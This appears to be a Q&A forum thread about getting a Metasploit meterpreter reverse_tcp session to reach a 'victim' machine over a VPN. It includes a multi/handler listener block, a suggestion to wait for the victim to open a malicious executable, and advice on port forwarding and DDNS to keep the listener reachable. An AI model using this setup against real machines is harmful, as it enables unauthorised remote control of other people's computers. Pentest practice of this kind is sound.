# Meterpreter session over VPN

Tags: vpn, metasploit, meterpreter

I have the following situation:

Attacker machine connected to a router with public IP assigned from ISP, forwarding enabled.

Victim machine connected to another router, (obviously) different IP assigned from different ISP.

I want establish a meterpreter session with reverse tcp. I create payload executable with msfvenom giving public IP of attacker router as LHOST parameter, then I start the listener setting the local IP of attacker machine as LHOST.

Till here no problem.

I tried to do the same with the attacker machine connected to a self made VPN server with no success. Is possible to do this?

If so, which IP addresses I have to set both in payload and in listener to get it working?

Answer (score 3, accepted):

If you are using a reverse shell, you need to set LHOST with the attacker VPN IP, not your internal LAN IP. Also you need to listen locally with Metasploit to a specific port that you should set on LPORT and must be the same of msfvenom (es. 443). To achieve this you can use:

```
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit
```

Then just wait the victim open your malicious executable file

Comment: Ok, and what about LHOST in msfvenom? I've tried using VPN public IP with no success.

Comment: Are you sure that the victim machine can connects to your VPN? Try to ping your VPN IP, is it reachable?

Comment: Effectively ping from victim to VPN does not work, but I can connect to VPN from every IP address. why?

Comment: I think it's a firewall problem. Try to disable it on VPN server, ping again the VPN, if it works you need to set a rule into VPN machine firewall

Comment: Disabled the firewall, I can ping the server but exploit still doesn't work. I can't figure out the issue.

Comment: Wait, is your victim machine connected to VPN?

Comment: No, it isn't. Should it be?

Comment: Yes because VPN can connect your machine into a remote LAN, if you use your VPN IP into the LHOST parameter you need to connect your victim machine into the same VPN. With this method you have 2 machine connected into a sort of LAN

Comment: So, I was mistaken everything. I was using public VPN IP as LHOST for the msfvenom created payload, but the victim machine was on a different LAN. Is there any way to do this? In every case, I'll flag the answer as accepted,thank you very much.

Comment: If you want to use your VPN IP, the attacker and victim machine must be on the same VPN, or you can connect to the victim LAN with a VPN or viceversa. The important thing is that the machines must be on the same network if you use a VPN.

Comment: I have the same issue. I can ping the listening machine(attacker) from the target machine using the public VPN ip of the attacker. But when I check using canyouseeme.org, I cant see the listening port. I use vpnbook.com and it claims that it doesn't block any port. Just to be sure, I should use the internal ip of the VPN as the LHOST for listener, right?

Comment: @Cricco95 Supposedly my ISP does not provide me static IP and I can not use VPN because the attacker will have to connect to VPN first. Is there any alternative to his?

Comment: @user666887 You can just find your public IP and use it as LHOST. Then open a port on your router and forward it to your private IP machine.

Comment: @Cricco95 I do understand that but if I use net for a long time IP address changes every 2-3hrs at max. So is there anything else I could use.

Comment: @user666887 You can use a DDNS

Answer (score 0):

Yes it is possible if you are using openvpn. You could setup a dmz. Openvpn has the capability's to do it. A vpn public ip can forward ports to its clients if configured with dmz. You should set the IP of your VPN and not your internal client ip as LHOST